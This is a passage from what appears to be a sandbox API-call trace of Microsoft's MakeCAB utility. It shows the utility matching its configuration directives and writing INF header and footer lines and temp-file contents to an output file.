BEGIN **********************************************************") returned 1 [0256.482] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.483] atoi (_Str="1*** BEGIN **********************************************************") returned 1 [0256.483] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 71 [0256.483] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfHeader%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfHeader1") returned 10 [0256.483] _strcmpi (_Str1="Cabinet", _Str2="InfHeader1") returned -6 [0256.483] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfHeader1") returned -6 [0256.483] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfHeader1") returned -6 [0256.483] _strcmpi (_Str1="ChecksumWidth", _Str2="InfHeader1") returned -6 [0256.483] _strcmpi (_Str1="ClusterSize", _Str2="InfHeader1") returned -6 [0256.483] _strcmpi (_Str1="Compress", _Str2="InfHeader1") returned -6 [0256.483] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfHeader1") returned 3 [0256.483] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfHeader1") returned -6 [0256.483] _strcmpi (_Str1="CompressionType", _Str2="InfHeader1") returned -6 [0256.483] _strcmpi (_Str1="CompressionLevel", _Str2="InfHeader1") returned -6 [0256.483] _strcmpi (_Str1="CompressionMemory", _Str2="InfHeader1") returned -6 [0256.483] _strcmpi (_Str1="DestinationDir", _Str2="InfHeader1") returned -5 [0256.483] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfHeader1") returned -5 [0256.483] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfHeader1") returned -5 [0256.483] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfHeader1") returned -5 [0256.483] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfHeader1") returned -3 [0256.483] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfHeader1") returned -3 [0256.483] _strcmpi (_Str1="GenerateInf", _Str2="InfHeader1") returned -2 [0256.483] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfHeader1") returned -5 [0256.483] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfHeader1") returned -5 [0256.483] _strcmpi (_Str1="InfCommentString", _Str2="InfHeader1") returned -5 [0256.483] _strcmpi (_Str1="InfDateFormat", _Str2="InfHeader1") returned -4 [0256.483] _strcmpi (_Str1="InfDiskHeader", _Str2="InfHeader1") returned -4 [0256.483] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfHeader1") returned -4 [0256.483] _strcmpi (_Str1="InfFileHeader", _Str2="InfHeader1") returned -2 [0256.483] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfHeader1") returned -2 [0256.483] _strcmpi (_Str1="InfFileName", _Str2="InfHeader1") returned -2 [0256.483] _strcmpi (_Str1="InfFooter", _Str2="InfHeader1") returned -2 [0256.483] _strcmpi (_Str1="InfFooter1", _Str2="InfHeader1") returned -2 [0256.483] _strcmpi (_Str1="InfFooter2", _Str2="InfHeader1") returned -2 [0256.483] _strcmpi (_Str1="InfFooter3", _Str2="InfHeader1") returned -2 [0256.483] _strcmpi (_Str1="InfFooter4", _Str2="InfHeader1") returned -2 [0256.483] _strcmpi (_Str1="InfHeader", _Str2="InfHeader1") returned -49 [0256.483] _strcmpi (_Str1="InfHeader1", _Str2="InfHeader1") returned 0 [0256.484] atoi (_Str="1** **") returned 1 [0256.484] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.484] atoi (_Str="1** **") returned 1 [0256.484] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 71 [0256.484] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfHeader%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfHeader2") returned 10 [0256.484] _strcmpi (_Str1="Cabinet", _Str2="InfHeader2") returned -6 [0256.484] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfHeader2") returned -6 [0256.484] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfHeader2") returned -6 [0256.484] _strcmpi (_Str1="ChecksumWidth", _Str2="InfHeader2") returned -6 [0256.484] _strcmpi (_Str1="ClusterSize", _Str2="InfHeader2") returned -6 [0256.484] _strcmpi (_Str1="Compress", _Str2="InfHeader2") returned -6 [0256.484] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfHeader2") returned 3 [0256.484] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfHeader2") returned -6 [0256.484] _strcmpi (_Str1="CompressionType", _Str2="InfHeader2") returned -6 [0256.484] _strcmpi (_Str1="CompressionLevel", _Str2="InfHeader2") returned -6 [0256.484] _strcmpi (_Str1="CompressionMemory", _Str2="InfHeader2") returned -6 [0256.484] _strcmpi (_Str1="DestinationDir", _Str2="InfHeader2") returned -5 [0256.484] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfHeader2") returned -5 [0256.484] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfHeader2") returned -5 [0256.484] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfHeader2") returned -5 [0256.484] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfHeader2") returned -3 [0256.484] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfHeader2") returned -3 [0256.484] _strcmpi (_Str1="GenerateInf", _Str2="InfHeader2") returned -2 [0256.484] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfHeader2") returned -5 [0256.484] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfHeader2") returned -5 [0256.484] _strcmpi (_Str1="InfCommentString", _Str2="InfHeader2") returned -5 [0256.484] _strcmpi (_Str1="InfDateFormat", _Str2="InfHeader2") returned -4 [0256.484] _strcmpi (_Str1="InfDiskHeader", _Str2="InfHeader2") returned -4 [0256.484] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfHeader2") returned -4 [0256.484] _strcmpi (_Str1="InfFileHeader", _Str2="InfHeader2") returned -2 [0256.484] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfHeader2") returned -2 [0256.484] _strcmpi (_Str1="InfFileName", _Str2="InfHeader2") returned -2 [0256.484] _strcmpi (_Str1="InfFooter", _Str2="InfHeader2") returned -2 [0256.484] _strcmpi (_Str1="InfFooter1", _Str2="InfHeader2") returned -2 [0256.484] _strcmpi (_Str1="InfFooter2", _Str2="InfHeader2") returned -2 [0256.485] _strcmpi (_Str1="InfFooter3", _Str2="InfHeader2") returned -2 [0256.485] _strcmpi (_Str1="InfFooter4", _Str2="InfHeader2") returned -2 [0256.485] _strcmpi (_Str1="InfHeader", _Str2="InfHeader2") returned -50 [0256.485] _strcmpi (_Str1="InfHeader1", _Str2="InfHeader2") returned -1 [0256.485] _strcmpi (_Str1="InfHeader2", _Str2="InfHeader2") returned 0 [0256.485] atoi (_Str="1** Automatically generated on: %2 **") returned 1 [0256.485] atoi (_Str="2 **") returned 2 [0256.485] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.485] _vsnprintf (in: _DstBuf=0x27e87fedf3, _MaxCount=0x1fc, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf="Tue Nov 06 11:27:43 2018") returned 24 [0256.485] atoi (_Str="1** Automatically generated on: %2 **") returned 1 [0256.485] atoi (_Str="2 **") returned 2 [0256.485] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 71 [0256.485] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfHeader%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfHeader3") returned 10 [0256.485] _strcmpi (_Str1="Cabinet", _Str2="InfHeader3") returned -6 [0256.485] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfHeader3") returned -6 [0256.485] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfHeader3") returned -6 [0256.485] _strcmpi (_Str1="ChecksumWidth", _Str2="InfHeader3") returned -6 [0256.485] _strcmpi (_Str1="ClusterSize", _Str2="InfHeader3") returned -6 [0256.485] _strcmpi (_Str1="Compress", _Str2="InfHeader3") returned -6 [0256.485] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfHeader3") returned 3 [0256.485] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfHeader3") returned -6 [0256.485] _strcmpi (_Str1="CompressionType", _Str2="InfHeader3") returned -6 [0256.485] _strcmpi (_Str1="CompressionLevel", _Str2="InfHeader3") returned -6 [0256.485] _strcmpi (_Str1="CompressionMemory", _Str2="InfHeader3") returned -6 [0256.485] _strcmpi (_Str1="DestinationDir", _Str2="InfHeader3") returned -5 [0256.485] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfHeader3") returned -5 [0256.485] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfHeader3") returned -5 [0256.485] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfHeader3") returned -5 [0256.485] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfHeader3") returned -3 [0256.485] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfHeader3") returned -3 [0256.485] _strcmpi (_Str1="GenerateInf", _Str2="InfHeader3") returned -2 [0256.485] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfHeader3") returned -5 [0256.485] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfHeader3") returned -5 [0256.486] _strcmpi (_Str1="InfCommentString", _Str2="InfHeader3") returned -5 [0256.486] _strcmpi (_Str1="InfDateFormat", _Str2="InfHeader3") returned -4 [0256.486] _strcmpi (_Str1="InfDiskHeader", _Str2="InfHeader3") returned -4 [0256.486] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfHeader3") returned -4 [0256.486] _strcmpi (_Str1="InfFileHeader", _Str2="InfHeader3") returned -2 [0256.486] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfHeader3") returned -2 [0256.486] _strcmpi (_Str1="InfFileName", _Str2="InfHeader3") returned -2 [0256.486] _strcmpi (_Str1="InfFooter", _Str2="InfHeader3") returned -2 [0256.486] _strcmpi (_Str1="InfFooter1", _Str2="InfHeader3") returned -2 [0256.486] _strcmpi (_Str1="InfFooter2", _Str2="InfHeader3") returned -2 [0256.486] _strcmpi (_Str1="InfFooter3", _Str2="InfHeader3") returned -2 [0256.486] _strcmpi (_Str1="InfFooter4", _Str2="InfHeader3") returned -2 [0256.486] _strcmpi (_Str1="InfHeader", _Str2="InfHeader3") returned -51 [0256.486] _strcmpi (_Str1="InfHeader1", _Str2="InfHeader3") returned -2 [0256.486] _strcmpi (_Str1="InfHeader2", _Str2="InfHeader3") returned -1 [0256.486] _strcmpi (_Str1="InfHeader3", _Str2="InfHeader3") returned 0 [0256.486] atoi (_Str="1** **") returned 1 [0256.486] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.486] atoi (_Str="1** **") returned 1 [0256.486] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 71 [0256.486] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfHeader%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfHeader4") returned 10 [0256.486] _strcmpi (_Str1="Cabinet", _Str2="InfHeader4") returned -6 [0256.486] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfHeader4") returned -6 [0256.486] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfHeader4") returned -6 [0256.486] _strcmpi (_Str1="ChecksumWidth", _Str2="InfHeader4") returned -6 [0256.486] _strcmpi (_Str1="ClusterSize", _Str2="InfHeader4") returned -6 [0256.486] _strcmpi (_Str1="Compress", _Str2="InfHeader4") returned -6 [0256.486] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfHeader4") returned 3 [0256.486] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfHeader4") returned -6 [0256.486] _strcmpi (_Str1="CompressionType", _Str2="InfHeader4") returned -6 [0256.486] _strcmpi (_Str1="CompressionLevel", _Str2="InfHeader4") returned -6 [0256.486] _strcmpi (_Str1="CompressionMemory", _Str2="InfHeader4") returned -6 [0256.486] _strcmpi (_Str1="DestinationDir", _Str2="InfHeader4") returned -5 [0256.486] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfHeader4") returned -5 [0256.486] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfHeader4") returned -5 [0256.486] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfHeader4") returned -5 [0256.487] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfHeader4") returned -3 [0256.487] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfHeader4") returned -3 [0256.487] _strcmpi (_Str1="GenerateInf", _Str2="InfHeader4") returned -2 [0256.487] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfHeader4") returned -5 [0256.487] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfHeader4") returned -5 [0256.487] _strcmpi (_Str1="InfCommentString", _Str2="InfHeader4") returned -5 [0256.487] _strcmpi (_Str1="InfDateFormat", _Str2="InfHeader4") returned -4 [0256.487] _strcmpi (_Str1="InfDiskHeader", _Str2="InfHeader4") returned -4 [0256.487] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfHeader4") returned -4 [0256.487] _strcmpi (_Str1="InfFileHeader", _Str2="InfHeader4") returned -2 [0256.487] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfHeader4") returned -2 [0256.487] _strcmpi (_Str1="InfFileName", _Str2="InfHeader4") returned -2 [0256.487] _strcmpi (_Str1="InfFooter", _Str2="InfHeader4") returned -2 [0256.487] _strcmpi (_Str1="InfFooter1", _Str2="InfHeader4") returned -2 [0256.487] _strcmpi (_Str1="InfFooter2", _Str2="InfHeader4") returned -2 [0256.487] _strcmpi (_Str1="InfFooter3", _Str2="InfHeader4") returned -2 [0256.487] _strcmpi (_Str1="InfFooter4", _Str2="InfHeader4") returned -2 [0256.487] _strcmpi (_Str1="InfHeader", _Str2="InfHeader4") returned -52 [0256.487] _strcmpi (_Str1="InfHeader1", _Str2="InfHeader4") returned -3 [0256.487] _strcmpi (_Str1="InfHeader2", _Str2="InfHeader4") returned -2 [0256.487] _strcmpi (_Str1="InfHeader3", _Str2="InfHeader4") returned -1 [0256.487] _strcmpi (_Str1="InfHeader4", _Str2="InfHeader4") returned 0 [0256.487] atoi (_Str="1** MakeCAB Version: %3 **") returned 1 [0256.487] atoi (_Str="3 **") returned 3 [0256.487] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.487] _vsnprintf (in: _DstBuf=0x27e87fedf3, _MaxCount=0x1fc, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf="Tue Nov 06 11:27:43 2018") returned 24 [0256.487] _vsnprintf (in: _DstBuf=0x27e87fee0d, _MaxCount=0x1e2, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf="10.0.10011.16384") returned 16 [0256.487] atoi (_Str="1** MakeCAB Version: %3 **") returned 1 [0256.487] atoi (_Str="3 **") returned 3 [0256.487] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 74 [0256.487] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfHeader%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfHeader5") returned 10 [0256.488] _strcmpi (_Str1="Cabinet", _Str2="InfHeader5") returned -6 [0256.488] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfHeader5") returned -6 [0256.488] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfHeader5") returned -6 [0256.488] _strcmpi (_Str1="ChecksumWidth", _Str2="InfHeader5") returned -6 [0256.488] _strcmpi (_Str1="ClusterSize", _Str2="InfHeader5") returned -6 [0256.488] _strcmpi (_Str1="Compress", _Str2="InfHeader5") returned -6 [0256.488] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfHeader5") returned 3 [0256.488] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfHeader5") returned -6 [0256.488] _strcmpi (_Str1="CompressionType", _Str2="InfHeader5") returned -6 [0256.488] _strcmpi (_Str1="CompressionLevel", _Str2="InfHeader5") returned -6 [0256.488] _strcmpi (_Str1="CompressionMemory", _Str2="InfHeader5") returned -6 [0256.488] _strcmpi (_Str1="DestinationDir", _Str2="InfHeader5") returned -5 [0256.488] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfHeader5") returned -5 [0256.488] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfHeader5") returned -5 [0256.488] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfHeader5") returned -5 [0256.488] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfHeader5") returned -3 [0256.488] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfHeader5") returned -3 [0256.488] _strcmpi (_Str1="GenerateInf", _Str2="InfHeader5") returned -2 [0256.488] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfHeader5") returned -5 [0256.488] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfHeader5") returned -5 [0256.488] _strcmpi (_Str1="InfCommentString", _Str2="InfHeader5") returned -5 [0256.488] _strcmpi (_Str1="InfDateFormat", _Str2="InfHeader5") returned -4 [0256.488] _strcmpi (_Str1="InfDiskHeader", _Str2="InfHeader5") returned -4 [0256.488] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfHeader5") returned -4 [0256.488] _strcmpi (_Str1="InfFileHeader", _Str2="InfHeader5") returned -2 [0256.488] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfHeader5") returned -2 [0256.488] atoi (_Str="1** **") returned 1 [0256.488] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.488] atoi (_Str="1** **") returned 1 [0256.488] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 71 [0256.488] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfHeader%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfHeader6") returned 10 [0256.489] atoi (_Str="1*** BEGIN **********************************************************") returned 1 [0256.489] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.489] atoi (_Str="1*** BEGIN **********************************************************") returned 1 [0256.489] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 71 [0256.489] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfHeader%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfHeader7") returned 10 [0256.489] atoi (_Str="1") returned 1 [0256.489] _vsnprintf (in: _DstBuf=0x27e87fed90, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fecf8 | out: _DstBuf="InfHeader7") returned 10 [0256.489] atoi (_Str="1") returned 1 [0256.489] fopen (_Filename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_2" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\inf_512_2"), _Mode="rb") returned 0x7ff97744e2d0 [0256.489] feof (_File=0x7ff97744e2d0) returned 0 [0256.489] fread (in: _DstBuf=0x27e8c1d860, _ElementSize=0x1, _Count=0x800, _File=0x7ff97744e2d0 | out: _DstBuf=0x27e8c1d860*, _File=0x7ff97744e2d0) returned 0x17 [0256.491] ferror (_File=0x7ff97744e2d0) returned 0 [0256.491] fwrite (in: _Str=0x27e8c1d860*, _Size=0x1, _Count=0x17, _File=0x7ff97744e2a0 | out: _Str=0x27e8c1d860*, _File=0x7ff97744e2a0) returned 0x17 [0256.491] ferror (_File=0x7ff97744e2a0) returned 0 [0256.491] feof (_File=0x7ff97744e2d0) returned 16 [0256.491] fclose (in: _File=0x7ff97744e2d0 | out: _File=0x7ff97744e2d0) returned 0 [0256.491] fopen (_Filename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_3" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\inf_512_3"), _Mode="rb") returned 0x7ff97744e2d0 [0256.492] feof (_File=0x7ff97744e2d0) returned 0 [0256.492] fread (in: _DstBuf=0x27e8c1d860, _ElementSize=0x1, _Count=0x800, _File=0x7ff97744e2d0 | out: _DstBuf=0x27e8c1d860*, _File=0x7ff97744e2d0) returned 0x1e [0256.492] ferror (_File=0x7ff97744e2d0) returned 0 [0256.492] fwrite (in: _Str=0x27e8c1d860*, _Size=0x1, _Count=0x1e, _File=0x7ff97744e2a0 | out: _Str=0x27e8c1d860*, _File=0x7ff97744e2a0) returned 0x1e [0256.492] ferror (_File=0x7ff97744e2a0) returned 0 [0256.492] feof (_File=0x7ff97744e2d0) returned 16 [0256.492] fclose (in: _File=0x7ff97744e2d0 | out: _File=0x7ff97744e2d0) returned 0 [0256.492] fopen (_Filename="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_4" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\inf_512_4"), _Mode="rb") returned 0x7ff97744e2d0 [0256.492] feof (_File=0x7ff97744e2d0) returned 0 [0256.492] fread (in: _DstBuf=0x27e8c1d860, _ElementSize=0x1, _Count=0x800, _File=0x7ff97744e2d0 | out: _DstBuf=0x27e8c1d860*, _File=0x7ff97744e2d0) returned 0x28 [0256.492] ferror (_File=0x7ff97744e2d0) returned 0 [0256.492] fwrite (in: _Str=0x27e8c1d860*, _Size=0x1, _Count=0x28, _File=0x7ff97744e2a0 | out: _Str=0x27e8c1d860*, _File=0x7ff97744e2a0) returned 0x28 [0256.492] ferror (_File=0x7ff97744e2a0) returned 0 [0256.492] feof (_File=0x7ff97744e2d0) returned 16 [0256.492] fclose (in: _File=0x7ff97744e2d0 | out: _File=0x7ff97744e2d0) returned 0 [0256.492] _strcmpi (_Str1="Cabinet", _Str2="InfFooter") returned -6 [0256.492] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFooter") returned -6 [0256.492] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFooter") returned -6 [0256.492] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFooter") returned -6 [0256.492] _strcmpi (_Str1="ClusterSize", _Str2="InfFooter") returned -6 [0256.493] _strcmpi (_Str1="Compress", _Str2="InfFooter") returned -6 [0256.493] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFooter") returned 3 [0256.493] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFooter") returned -6 [0256.493] _strcmpi (_Str1="CompressionType", _Str2="InfFooter") returned -6 [0256.493] _strcmpi (_Str1="CompressionLevel", _Str2="InfFooter") returned -6 [0256.493] _strcmpi (_Str1="CompressionMemory", _Str2="InfFooter") returned -6 [0256.493] _strcmpi (_Str1="DestinationDir", _Str2="InfFooter") returned -5 [0256.493] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFooter") returned -5 [0256.493] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFooter") returned -5 [0256.493] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFooter") returned -5 [0256.493] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFooter") returned -3 [0256.493] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFooter") returned -3 [0256.493] _strcmpi (_Str1="GenerateInf", _Str2="InfFooter") returned -2 [0256.493] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFooter") returned -3 [0256.493] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFooter") returned -3 [0256.493] _strcmpi (_Str1="InfCommentString", _Str2="InfFooter") returned -3 [0256.493] _strcmpi (_Str1="InfDateFormat", _Str2="InfFooter") returned -2 [0256.493] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFooter") returned -2 [0256.493] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFooter") returned -2 [0256.493] _strcmpi (_Str1="InfFileHeader", _Str2="InfFooter") returned -6 [0256.493] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfFooter") returned -6 [0256.493] _strcmpi (_Str1="InfFileName", _Str2="InfFooter") returned -6 [0256.493] _strcmpi (_Str1="InfFooter", _Str2="InfFooter") returned 0 [0256.493] atoi (_Str="1*** END ************************************************************") returned 1 [0256.493] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.493] atoi (_Str="1*** END ************************************************************") returned 1 [0256.493] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 71 [0256.493] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfFooter%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfFooter1") returned 10 [0256.493] _strcmpi (_Str1="Cabinet", _Str2="InfFooter1") returned -6 [0256.493] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFooter1") returned -6 [0256.493] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFooter1") returned -6 [0256.493] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFooter1") returned -6 [0256.494] _strcmpi (_Str1="ClusterSize", _Str2="InfFooter1") returned -6 [0256.494] _strcmpi (_Str1="Compress", _Str2="InfFooter1") returned -6 [0256.494] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFooter1") returned 3 [0256.494] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFooter1") returned -6 [0256.494] _strcmpi (_Str1="CompressionType", _Str2="InfFooter1") returned -6 [0256.494] _strcmpi (_Str1="CompressionLevel", _Str2="InfFooter1") returned -6 [0256.494] _strcmpi (_Str1="CompressionMemory", _Str2="InfFooter1") returned -6 [0256.494] _strcmpi (_Str1="DestinationDir", _Str2="InfFooter1") returned -5 [0256.494] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFooter1") returned -5 [0256.494] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFooter1") returned -5 [0256.494] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFooter1") returned -5 [0256.494] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFooter1") returned -3 [0256.494] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFooter1") returned -3 [0256.494] _strcmpi (_Str1="GenerateInf", _Str2="InfFooter1") returned -2 [0256.494] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFooter1") returned -3 [0256.494] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFooter1") returned -3 [0256.494] _strcmpi (_Str1="InfCommentString", _Str2="InfFooter1") returned -3 [0256.494] _strcmpi (_Str1="InfDateFormat", _Str2="InfFooter1") returned -2 [0256.494] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFooter1") returned -2 [0256.494] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFooter1") returned -2 [0256.494] _strcmpi (_Str1="InfFileHeader", _Str2="InfFooter1") returned -6 [0256.494] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfFooter1") returned -6 [0256.494] _strcmpi (_Str1="InfFileName", _Str2="InfFooter1") returned -6 [0256.494] _strcmpi (_Str1="InfFooter", _Str2="InfFooter1") returned -49 [0256.494] _strcmpi (_Str1="InfFooter1", _Str2="InfFooter1") returned 0 [0256.494] atoi (_Str="1** **") returned 1 [0256.494] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.494] atoi (_Str="1** **") returned 1 [0256.494] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 71 [0256.494] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfFooter%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfFooter2") returned 10 [0256.494] _strcmpi (_Str1="Cabinet", _Str2="InfFooter2") returned -6 [0256.494] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFooter2") returned -6 [0256.494] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFooter2") returned -6 [0256.495] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFooter2") returned -6 [0256.495] _strcmpi (_Str1="ClusterSize", _Str2="InfFooter2") returned -6 [0256.495] _strcmpi (_Str1="Compress", _Str2="InfFooter2") returned -6 [0256.495] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFooter2") returned 3 [0256.495] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFooter2") returned -6 [0256.495] _strcmpi (_Str1="CompressionType", _Str2="InfFooter2") returned -6 [0256.495] _strcmpi (_Str1="CompressionLevel", _Str2="InfFooter2") returned -6 [0256.495] _strcmpi (_Str1="CompressionMemory", _Str2="InfFooter2") returned -6 [0256.495] _strcmpi 